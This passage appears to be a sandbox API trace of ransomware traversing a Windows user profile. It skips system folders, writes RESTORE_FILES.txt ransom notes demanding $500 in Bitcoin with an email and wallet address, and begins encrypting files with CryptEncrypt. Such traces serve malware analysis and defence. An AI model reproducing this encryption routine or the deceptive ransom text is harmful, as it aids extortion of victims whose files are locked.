(lpString1="..", lpString2="Program Files") returned -1 [0084.509] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.509] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.509] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.509] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\..") returned 86 [0084.509] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.509] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.509] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0084.509] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.509] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\RESTORE_FILES.txt") returned 101 [0084.509] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\WidevineCdm\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\widevinecdm\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.510] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.510] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.510] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.510] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0084.510] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.511] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0084.511] CloseHandle (hObject=0x150) returned 1 [0084.511] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0084.511] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0084.511] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\RESTORE_FILES.txt") returned 89 [0084.511] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.511] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.511] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0084.512] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.512] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0084.512] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.512] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0084.512] CloseHandle (hObject=0x14c) returned 1 [0084.512] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0084.512] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0084.512] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\RESTORE_FILES.txt") returned 79 [0084.512] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0084.512] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.512] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0084.513] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.513] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0084.513] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.513] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0084.513] CloseHandle (hObject=0xd8) returned 1 [0084.514] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0084.514] lstrcmpiW (lpString1="CrashReports", lpString2="Windows") returned -1 [0084.514] lstrcmpiW (lpString1="CrashReports", lpString2="Program Files") returned -1 [0084.514] lstrcmpiW (lpString1="CrashReports", lpString2="Program Files (x86)") returned -1 [0084.514] lstrcmpiW (lpString1="CrashReports", lpString2="$Recycle.bin") returned 1 [0084.514] lstrcmpiW (lpString1="CrashReports", lpString2="System Volume Information") returned -1 [0084.514] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports") returned 67 [0084.514] lstrcmpW (lpString1="CrashReports", lpString2=".") returned 1 [0084.514] lstrcmpW (lpString1="CrashReports", lpString2="..") returned 1 [0084.515] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports\\*") returned 69 [0084.515] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0084.515] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.515] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.515] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.515] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.515] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.515] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports\\.") returned 69 [0084.515] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.515] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.515] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.515] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.515] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.515] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.515] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.515] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports\\..") returned 70 [0084.515] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.515] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.515] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0084.515] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0084.515] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports\\RESTORE_FILES.txt") returned 85 [0084.515] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\CrashReports\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\crashreports\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0084.516] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.516] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0084.516] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.516] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0084.516] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.516] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0084.516] CloseHandle (hObject=0xd8) returned 1 [0084.516] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0084.516] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0084.517] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\RESTORE_FILES.txt") returned 72 [0084.517] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0084.517] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.517] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0084.518] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.518] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0084.518] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.518] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0084.518] CloseHandle (hObject=0xd4) returned 1 [0084.518] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0084.518] lstrcmpiW (lpString1="History", lpString2="Windows") returned -1 [0084.518] lstrcmpiW (lpString1="History", lpString2="Program Files") returned -1 [0084.518] lstrcmpiW (lpString1="History", lpString2="Program Files (x86)") returned -1 [0084.518] lstrcmpiW (lpString1="History", lpString2="$Recycle.bin") returned 1 [0084.518] lstrcmpiW (lpString1="History", lpString2="System Volume Information") returned -1 [0084.518] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History") returned 55 [0084.518] lstrcmpW (lpString1="History", lpString2=".") returned 1 [0084.518] lstrcmpW (lpString1="History", lpString2="..") returned 1 [0084.518] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\*") returned 57 [0084.518] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\History\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0xffffffff [0084.519] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0084.519] lstrcmpiW (lpString1="IconCache.db", lpString2="Windows") returned -1 [0084.519] lstrcmpiW (lpString1="IconCache.db", lpString2="Program Files") returned -1 [0084.519] lstrcmpiW (lpString1="IconCache.db", lpString2="Program Files (x86)") returned -1 [0084.519] lstrcmpiW (lpString1="IconCache.db", lpString2="$Recycle.bin") returned 1 [0084.519] lstrcmpiW (lpString1="IconCache.db", lpString2="System Volume Information") returned -1 [0084.519] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db") returned 60 [0084.519] StrStrIW (lpFirst="IconCache.db", lpSrch=".protected") returned 0x0 [0084.520] lstrcmpW (lpString1="IconCache.db", lpString2="RESTORE_FILES.txt") returned -1 [0084.520] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0084.520] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, 